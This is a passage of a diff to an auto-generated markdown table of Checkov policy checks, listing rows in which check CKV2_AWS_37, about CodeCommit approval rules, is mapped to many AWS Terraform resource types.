[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1217 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1218 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1219 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1220 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1221 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1222 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1223 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1224 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1225 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1226 | CKV2_AWS_37 | resource | 
aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1227 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1228 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1229 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1230 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1231 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1232 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1233 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1234 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1235 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1236 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1237 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1238 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1239 | CKV2_AWS_37 | resource | 
aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1240 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1241 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1242 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1243 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1244 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1245 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1246 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1247 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1248 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1249 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1250 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1251 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1252 | CKV2_AWS_37 | resource | 
aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1253 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1254 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1255 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1256 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1257 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1258 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
+| 1259 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1260 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1261 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1262 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1263 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1264 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1265 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1266 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1267 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1268 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1269 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1270 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1271 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1272 | CKV2_AWS_37 | resource | aws_opsworks_application | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1273 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1274 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1275 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1276 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1277 | CKV2_AWS_37 | resource | aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1278 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 
+| 1279 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1280 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1281 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1282 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1283 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1284 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1285 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1286 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1287 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1288 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1289 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1290 | CKV2_AWS_37 | resource | aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1291 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1292 | CKV2_AWS_37 | resource | 
aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1293 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1294 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1295 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1296 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1297 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1298 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1299 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1300 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1301 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1302 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1303 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1304 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1305 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1306 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1307 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1308 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1309 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1310 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1311 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1312 | CKV2_AWS_37 | 
resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1313 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1314 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1315 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1316 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1317 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1318 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | 
